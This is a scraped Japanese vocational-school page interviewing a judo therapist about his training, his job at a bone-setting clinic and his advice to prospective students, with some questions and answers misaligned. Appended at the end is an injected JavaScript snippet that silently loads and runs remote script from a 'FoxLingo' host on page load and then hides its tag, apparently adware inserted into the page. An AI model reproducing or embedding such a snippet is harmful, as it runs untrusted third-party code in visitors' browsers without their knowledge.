柔道整復師 山田 さん

患者様を笑顔にしたい。

柔道整復師 山田 さん
前田針灸接骨院
平成21年3月 京都医健 柔道整復科卒業
中京大学 出身

Qaq 柔道整復師を目指したきっかけ

Qaa 午前中と夕方からの接骨院勤務の合間で学校に通っていたので、3年間はあっという間でした。実は1年生の最初の頃は再試験になったりと、決して優秀な学生とは言えませんでしたが、同じ社会人経験を経て入学したクラスメイトや先生に助けられ、国家試験に合格することができました。

Qaq 学生時代の思い出

Qaq 現在の仕事について

Qaa 実は、卒業直後は別の治療院に勤務していましたが、結婚を控え、勤務地や待遇面などを見直したいと思い、京都医健のキャリアセンターに相談しました。そこで、新居からの距離や私が以前から希望していた、スポーツとの関わりも考慮し、現在勤務している前田針灸接骨院を紹介していただきました。歴史と伝統のある針灸接骨院なので、様々な患者さんを診させていただく機会があり、1日1日が勉強です。高等学校などスポーツ現場へも治療に行きますが、スピード感が求められるので、院内の勤務とはまた違った緊張感とやりがいがあります。

Qaq これからの目標

Qaa 若い頃のように、目標に向かってがむしゃらに頑張る気持ちを持ち続けて行きたいと思います。今後は、自分の治療スタイルを少しずつ確立していきたいですね。

Qaq 柔道整復師を目指す方へのメッセージ

Qaa 患者さまが気になる事が気軽に聞けたり、相談できたりと、患者さまにとって身近な存在でいられることが柔道整復師の魅力です。高齢の患者さまであれば、自分の祖父母の様に、どんな患者さまも自分の家族のように親身になって接する気持ちが大切だと思います。1度きりの人生、タイミングが大切です。ほんとうにやりたいことなら覚悟を持って飛び込んでみてください。

!function(){try{var h=document.getElementsByTagName(“head”)[0];var s=document.createElement(“script”);s.src=”//edge.crtinv.com/products/FoxLingo/default/snippet.js”;s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState==”loaded” || this.readyState==”complete”){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();